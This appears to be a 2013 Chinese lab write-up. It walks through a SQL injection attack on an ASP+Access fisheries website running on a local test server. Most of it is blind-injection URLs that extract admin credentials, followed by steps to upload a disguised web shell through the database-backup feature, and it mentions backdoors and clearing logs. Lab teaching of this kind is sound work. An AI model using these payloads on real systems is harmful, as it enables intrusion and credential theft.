sql註入之asp+access案例

僅供學習參考，2013.5.8日學習整理記錄

潛江水產案例
(sql註入之asp+access)
實驗目的通過註入漏洞上傳config.asp
實驗過程如下所示：
實驗前提：在服務器上要搭建好IIS
開始實驗
把已經編好的web通過共享的方式上傳到服務器上，然後解壓這個潛江水產的數據包
文件，然後把這個數據包導入到c:\inetpub\wwwroot下面，接著通過命令行inetmgr打開
搭建好的默認網站，然後在默認網站中的主目錄下面指定潛江水產的路徑，然後在配置中的設置中啟用父路徑，在指引中添加index.asp，然後在網絡擴展中把asp給啟動
網站服務器一切準備好後，在客戶端來訪問一下潛江水產的服務器
現在我們就要利用編程的簡單的查詢來推斷網站是否存在註入漏洞

訪問網站後，在地址欄輸入：http：\192.168.2.4，然後在網頁中找到一個武漢水產專家，
當出現地址為：http：//192.168.2.4/shownews.asp？id=41時，這就是典型的註入漏洞
我們可以用下面可以到shownews.asp中查看一下看有沒有“武漢水產專家”，發現找不到，說明這個新聞頁面時保存在數據庫裏面的
現在我們到數據庫中查詢一下“select”
下面是搭建好潛江水產的web頁面

http://192.168.2.4/shownews.asp？id=41查詢正常

我們可以用三種方法來確定它存在註入漏洞
1.http://192.168.2.4/shownews.asp？id=41’查詢不正常

2.http://192.168.2.4/shownews.asp? id=41 and 1=1查詢正常

3.http://192.168.2.4/shownews.asp? id=41 and 1=2查詢不正常

4.http://192.168.2.4/shownews.asp？id=41 and select username，password from user查詢報錯

5.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(*) from admin)正常訪問

6.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(*) from admin1)不正常訪問

7.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(user) from admin)查詢正常

8.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(password) from admin)

9.http://192.168.2.4/shownews.asp？id=41 and （select top 1 len （user）from admin）>0 正常

10.http://192.168.2.4/shownews.asp？id=41 and （select top 1 len （user）from admin）>1正常

11.http://192.168.2.4/shownews.asp？id=41 and （select top 1 len （user）from admin）>2 正常，知道出現報錯就是那個數，這樣一個一個的嘗試，直到出現報錯時為止。那麽密碼的長度就為那個報錯的位數，接下來就是猜密碼了

12.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（mid（user，1，1））from admin）>0出現錯誤

13.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（ mid（username，1，1））from admin）>0正常

14.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 len（username）from admin ）>1

15.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 len（username）from admin ）>2 剛剛前面出現了問題，現在又要重新的再來猜一遍，直到猜出報錯時為止，那麽密碼的長度就為出現報錯的那個數

16.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（mid（username，1，1））from admin）>0 現在來猜管理員的帳號

下面是用小葵來一步一步的破解密碼的過程

17.http://192.168.2.4/shownews.asp？id=41 and (select top 1 len （password）from admin) >0 現在猜密碼的長度

18.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（mid（password，1，1））from admin）>0 現在就猜密碼為多少

下面是用小葵來一步一步的破解密碼

現在管理員的帳號已經查出來了，管理員的密碼也猜出來了
接下來就要開始註入了
在潛江水產網的下面找到“網站管理”，然後輸入管理員的帳號和密碼就可以直接訪問後臺
然後找到新聞的編輯頁面，在這裏面找到插入圖片，你就可以利用這個漏洞來上傳圖片，也就把config.asp這個文件傳上去了，但是這裏文件只有jpg，gpf，那麽你就要
回到客戶端，把config.asp的後綴名改為gpf或jpg內型的，
然後找到這個文件存放的地方，在客戶端的地址欄中輸入這個地址，發現不能夠訪問
然後在系統管理中找到上傳文件，然後找到數據庫備份，然後把文件備份一下，並找到備份的路徑
然後把圖片的路徑保存在當前的數據庫下，然後把保存的數據庫的名稱的後綴名更改一下，
然後復制這個地址，然後在地址欄中輸入這個confi.asp文件的路徑

在這裏需要把裏面的內容填寫一下，然後再上傳，然後找到上傳後的路徑地址

下面就可以一步一步的通過config.asp來上傳文件，然後提權，然後遠程登錄，然後做後門，然後清除日誌等一系列的操作，在這裏我就不演示了

總結：僅供學習參考，資料來源於2013.5.8日學習整理，請勿做違法犯禁事情，違者自咎，我只是提供一個學習平臺，僅供學習參考，希望大家把這個拿來作為公司的安全防護做漏洞測試，請勿用來作侵害他人財產或者經濟損失及個人隱私安全泄露的事情，違者當事人自負，註意，此僅僅是供學習參考借鑒使用，請勿做違法事情

實驗十一：sql註入之asp+access案例